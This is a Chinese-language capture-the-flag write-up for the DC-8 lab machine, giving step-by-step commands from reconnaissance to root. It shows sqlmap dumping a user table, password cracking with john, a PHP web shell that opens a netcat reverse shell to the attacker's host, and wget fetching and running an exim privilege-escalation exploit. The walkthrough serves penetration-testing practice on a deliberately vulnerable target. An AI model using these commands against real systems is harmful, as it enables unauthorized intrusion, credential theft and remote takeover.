靶机信息
靶机地址:https://www.five86.com/dc-8.html
下载完成后,运行文件夹中的.ova文件即可安装靶机(vmware)
网络连接方式为NAT,kali与靶机为同一网段
信息搜集
nmap扫描网段,判断出目标主机IP后扫描主机
nmap -sn 192.168.74.0/24
nmap -A 192.168.74.132
访问80端口,打开网站看一下,看到这边有个列表
漏洞利用
点击列表后,发现url出现?nid=2,试下sql注入
随便试下,出现报错,存在注入点,直接sqlmap跑下
上来就是sqlmap四连
sqlmap -u http://192.168.74.132/?nid=2 --dbs
# 查看数据库
sqlmap -u http://192.168.74.132/?nid=2 --tables -D d7db
# 查看d7db库的表
sqlmap -u http://192.168.74.132/?nid=2 --columns -T users -D d7db
# 查看d7db库的users表的字段
sqlmap -u http://192.168.74.132/?nid=2 --dump -C "name,pass" -T users -D d7db
# 查看d7db库的users表的name和pass字段的内容
用john工具,破解的同时也可以识别加密方式,把要破解的密码写到txt文件中
破解出来的密码为turtle
john dc7.txt
使用账号密码登录,路径为/user
然后编辑模板,准备写shell回连,发现只有Contact US界面可以编辑
Home>Contact Us>WebForm>Form settings
写入shell,记得设置php代码,页面最底下保存设置
<?php
system('nc 192.168.74.129 666 -e /bin/bash')
?>
在kali上设置监听端口,退出登录,在Contact Us界面提交信息
权限提升
提交后回连成功
获取交互模式shell
python -c 'import pty;pty.spawn("/bin/bash")'
大概看了下没啥东西,试了下sudo -l 没东西,再看下哪些指令有root权限
find / -perm -u=s -type f 2>/dev/null
搜下exim的漏洞,searchsploit exim,再看下exim的版本
用Local Privilege Escalation这个漏洞,对应的46996.sh文件在/usr/share/exploitdb/exploits/linux/local下,只有tmp目录权限较高,把文件上传到这里
由于现在还没有权限,上传的话可以通过wget来上传,确保kali上有web服务,httpd或nginx,确保能通过网页访问到,然后将漏洞的脚本文件放到kali的/var/www/html目录下
然后在靶机的tmp目录下输入wget命令来下载kali上的脚本文件
wget http://192.168.74.129/46996.sh
然后给脚本文件增加权限,并运行
出现报错,搜下bad interpreter,编码格式问题,输入sed -i “s/\r//” filename即可
chmod 777 46996.sh
./46996.sh
转换格式
sed -i "s/\r//" 46996.sh
看起来是执行成功了,但是好像还没权限,看了下脚本文件,发现还差一步
又分别执行了一下图中的两条命令,最后是用第二条命令拿到权限
./46996.sh -m netcat
在root目录下找到flag